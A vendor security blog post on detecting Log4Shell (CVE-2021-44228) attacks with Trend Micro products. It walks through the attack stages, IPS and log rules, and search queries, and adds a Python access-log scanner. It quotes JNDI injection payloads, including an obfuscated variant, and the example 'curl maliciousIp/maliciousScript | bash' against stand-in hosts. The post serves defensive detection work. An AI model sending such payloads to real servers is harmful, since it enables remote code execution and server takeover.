How to Detect Apache Log4j Vulnerabilities

Network Security

Discover how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools.
By: Nitesh Surana

January 27, 2022


In my previous blog, I reviewed how to detect exploitation of Apache HTTP server vulnerabilities in October. Weirdly enough, I wrote that article before the Apache Log4j (Log4Shell) news broke in December 2021. So I'm back to write about how to detect the infamous Log4j vulnerability (CVE-2021-44228), which allows attackers to achieve remote code execution on victim servers that use vulnerable versions of the popular library in exposed web applications/services.
Stages of a Log4j attack
Before diving straight into detection/prevention, let's first take a look at the different stages of the attack. For the majority of attacks in which Log4j is exploited, the flow looks like this:

Source: Trend Micro
The above depicts a vulnerable public-facing web service that logs the User-Agent field from the HTTP request. Here's how the attack works:

1. The malicious Java Naming and Directory Interface (JNDI) payload can arrive over any protocol; it just needs to reach the vulnerable Log4j logging mechanism. In this case, the protocol is HTTP and the payload is sent in the 'User-Agent' header.
2. The value of the User-Agent header is logged by a vulnerable web application using the Log4j library. Logging of fields like these is common in Java-based applications.
3. The payload ${jndi:ldap://attacker/a} is looked up using JNDI, which in turn tries to access the LDAP server.
4. If remote loading of Java classes is enabled (i.e., if com.sun.jndi.ldap.object.trustURLCodebase is set to true), the attacker's infrastructure is called out to using one of a set of protocols (LDAP in this case).
5. The LDAP response can contain either of the two:

   The response itself might contain the malicious Java bytecode.

   The response contains a reference to the attacker's infrastructure from where the malicious Java class file is fetched.

   In this case, the Java class file is fetched as follows:

6. The malicious bytecode is executed, which in turn leads to the malicious command and control in step 7.
7. Malicious command and control is observed between the attacker's infrastructure and the vulnerable server.

Detection of Log4j
Now that we have a fair understanding of what the vulnerability is and how it looks, let's explore how to detect Log4j attacks using Trend Micro Cloud One™ and Trend Micro Vision One™.
As I mentioned in the last blog, Trend Micro Cloud One is a security services platform for cloud builders composed of seven services. It's integrated with Trend Micro Vision One, which leverages industry-leading XDR capabilities to collect, correlate, and display data from Trend Micro Cloud One in a simple dashboard.
In this scenario, we used Trend Micro Cloud One™ – Network Security and Trend Micro Cloud One™ – Workload Security to detect Log4j vulnerabilities. Network Security goes beyond traditional intrusion prevention systems (IPS) to inspect ingress and egress traffic, adding another layer of security in front of the vulnerable Log4j library. At the same time, Workload Security ensures your containers and datacenters are secured with automated scanning and customizable post-scan actions.
Let's dissect how Workload Security works:

Here we see how the different Workload Security modules work in tandem, capturing an overview of the different stages of a successful exploit attempt.
The following is a list of IPS rules for detecting Log4j:

1011242 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228 and CVE-2021-45046)
1011249 – Apache Log4j Denial of Service Vulnerability (CVE-2021-45105)
1005177 – Restrict Java Bytecode File (Jar/Class) Download

Here's how the rules work to detect the attack at its different stages:

IPS rule 1011242 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228) detects stage one of the attack, wherein the JNDI payload is injected in the request body/header/URI/uriquery.
IPS rule 1011249 – Apache Log4j Denial of Service Vulnerability (CVE-2021-45105) detects traffic carrying the denial-of-service JNDI payload in the request body/header/URI/uriquery.
IPS rule 1005177 – Restrict Java Bytecode File (Jar/Class) Download triggers when a client downloads a .class or .jar file, the step at which attacker-controlled, malicious code is executed on a target.

We also use a log inspection rule to detect the vulnerability.

The log inspection rule 1011241 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228) looks for JNDI payloads in the access logs, with the default path being /var/log/*/access.log.

Different log sources from other applications can be inspected by adding the log files, using their absolute paths, in the Configuration tab.
Now that we've covered Workload Security detections, let's review how Network Security helps detect and prevent exploitation of Log4j vulnerabilities using the following IPS filters:

40652: HTTP: Apache Log4j StrSubstitutor Denial-of-Service Vulnerability (ZDI-21-1541) detects an attempt to exploit a denial-of-service vulnerability in Apache Log4j. The specific flaw exists due to a failure to properly sanitize values being logged. Successful exploitation results in a denial-of-service condition.
40651: HTTP: JNDI Recursive Variable Substitution in an HTTP Request detects the use of a recursive variable substitution within a JNDI expression in an HTTP request. While not inherently malicious, traffic of this nature can be used to create a denial-of-service condition in some vulnerable configurations of Log4j, or to bypass detection of other JNDI vulnerabilities.
40627: HTTP: JNDI Injection in HTTP Request detects an attempt to inject JNDI requests into an HTTP request. While not inherently malicious, the presence of JNDI code in HTTP requests can be indicative of an attempt to exploit a known code execution vulnerability in Log4j.
13876: TCP: Download/Upload of a Java .class Application detects an attempt to download or upload a Java .class file. Oracle Java is an object-oriented programming language used across a huge number of devices and appliances. Based on the expected common prevalence of matches on this filter's logic, it should not be deployed inline with a blocking action set until fully performance tested and vetted for false positives in its target production environment. This is a policy filter which, when enabled in certain deployments, may be susceptible to false positive conditions as well as possible performance impacts. If Oracle Java is not deployed or expected to be deployed in your network, this filter should not be enabled in blocking mode.
40640: LDAP: Generic BIND Request (Non-Standard Ports) detects an LDAP BIND request on non-standard ports.
40646: LDAP: Generic BIND Request (Standard Ports) detects an LDAP BIND request on standard ports.

Tying it all together with Trend Micro Vision One

Observed attack techniques from Trend Micro Vision One
We've seen how Network Security and Workload Security can detect Log4j vulnerabilities, but what good is that information by itself? Trend Micro Vision One puts the puzzle together so you can have complete visibility across all data in a single console. Let's dive into what you can see (pun intended) with Trend Micro Vision One:
Observed attack techniques (OATs)
These are individual alerts that indicate unit steps of high significance (for example, an IPS trigger for the Log4j remote code execution (RCE) vulnerability, or a log inspection trigger for a Log4j JNDI payload in access logs).
The Trend Micro Vision One Threat Hunting app helps you see if anything suspicious or alarming is happening across endpoints. In this example, the following OATs should be investigated to narrow down the whereabouts of a possible intrusion:
F4778 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
F4779 – Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
F4780 – Restrict Java Bytecode File (Jar or Class) Download
F4783 – Vulnerable LOG4J Version for CVE-2021-44228
F4801 – Apache Log4j Denial of Service Vulnerability
F4795 – Apache Log4j Remote Code Execution
Search App Queries
The Search app helps find malicious JNDI payloads from the different Workload Security module detections across all endpoints reporting to Trend Micro Vision One. Below are examples of searches I made based on my understanding of the vulnerability and where the observed events show up:

Using Search Method: Endpoint Activity Data, look for a parent process with java in its file path creating a curl or wget process. In the majority of attacks observed, curl and wget were used to download and run malicious scripts and executables on vulnerable servers.

Search: (processCmd:curl OR processCmd:wget) AND parentFilePath:*java*

JNDI payload patterns in the msg field of Workload Security prevention triggers. Search: eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1011249) AND ("${" AND ("lower:" OR "upper:" OR "sys:" OR "env:" OR "java:" OR "jndi:"))

JNDI payload patterns in the remarks field of Workload Security log inspection triggers. Search: eventName:LOG_INSPECTION_EVENT AND ("${" AND ("lower:" OR "upper:" OR "sys:" OR "env:" OR "java:" OR "jndi:"))
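The log inspection rule and the two searches above both reduce to one question: does a logged value contain a ${...} lookup that, once Log4j's nested substitution is applied, resolves to a jndi: lookup? The following is an added example (not code from the original post or from Trend Micro) that runs that check over constructed access-log lines; the de-obfuscation only resolves the lower:/upper:/default-value forms the searches key on, which is an assumption about what is worth normalizing, not a full StrSubstitutor.

```python
import re
from typing import List, Optional, Tuple

# Lookup prefixes the Vision One search queries above key on.
LOOKUP_PREFIXES = ("lower:", "upper:", "sys:", "env:", "java:", "jndi:")

# One innermost ${...} expression: no further "${" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

def _resolve(m: "re.Match") -> str:
    # Evaluate a single innermost lookup the way nested substitution would.
    body = m.group(1)
    key, _, arg = body.partition(":")
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if ":-" in body:             # ${anything:-default} falls back to its default
        return body.split(":-", 1)[1]
    return body                  # other lookups (jndi:, sys:, env:) stay visible as text

def collapse_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested ${...} from the inside out, e.g.
    '${${lower:j}ndi:ldap://x/a}' -> 'jndi:ldap://x/a'."""
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def classify_line(line: str) -> Optional[str]:
    """'jndi' for a (possibly obfuscated) JNDI lookup, 'lookup' for any other
    ${lower:/upper:/sys:/env:/java:} expression, None for a benign line."""
    if "${" not in line:
        return None
    if "jndi:" in collapse_lookups(line).lower():
        return "jndi"
    if any(p in line.lower() for p in LOOKUP_PREFIXES):
        return "lookup"
    return None

def scan_access_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, verdict, line) for every flagged access-log line."""
    return [(n, v, l) for n, l in enumerate(lines, 1) if (v := classify_line(l))]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker/a}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:ldap://attacker/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET /?q=${sys:user.home} HTTP/1.1" 200 512 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for n, verdict, line in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {line}")
```

Lines 2 and 3 are reported as jndi (the nested lower:/upper: form collapses to the same jndi: lookup) and line 4 as a non-JNDI lookup, which is the same split the ruleId/prefix filters in the searches produce.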

Root-cause analysis (RCA)
Using Trend Micro Vision One, we can use the Execution Profile to perform a deeper RCA, helping analysts understand the chain of events in attacks that try to exploit Log4j.

In the attacks we observed, the Log4j vulnerability is exploited to download malicious shell scripts onto the target machine using curl or wget and execute them by piping them to bash or sh: curl maliciousIp/maliciousScript | bash.
The RCA above shows the outbound connections to an attacker-controlled IP address and the creation of Executable and Linkable Format (ELF) binaries. The downloaded ELFs are made executable using the chmod utility.

In this RCA, we see execution of shell commands like clear, id, and whoami, which are executed with systemd-shell as the parent process. As we can see, they stem from the bash shell, and the command line is logged by the Activity Monitoring module.
Workbench

The Trend Micro Vision One Workbench helps you visualize and take action on the most significant events observed in an environment. These detections include telemetry from various Trend Micro products (in this case, Trend Micro Cloud One services), and the Workbench condenses them into a single-pane-of-glass view.
Here we see Bash Shell Script Execution observed right after the IPS trigger for Log4j. The Impact Scope displays the number of hosts/servers observed with activity correlated to the alert. The highlighted fields (processCmd, processFilePath) on the left are what is being monitored across the other deployments and workloads throughout the organization.

In this trigger, we see outbound network activity to a known cryptocurrency mining pool after the Log4j vulnerability is exploited. Attackers have been exploiting the vulnerability to deliver cryptocurrency coinminers and MIRAI botnet malware. The Command and Control (C&C) observed is logged by the Web Reputation Service and Activity Monitoring.

In this Workbench trigger, the event comes from the Log Inspection module, wherein the JNDI payload was observed in the access logs of a web server.

Next steps
Keep up to date on developing Log4Shell news here. You can also start a free trial or check out our extensive documentation library to see how Trend Micro Vision One powers layered detection and response for our cloud-builder security platform, Trend Micro Cloud One.
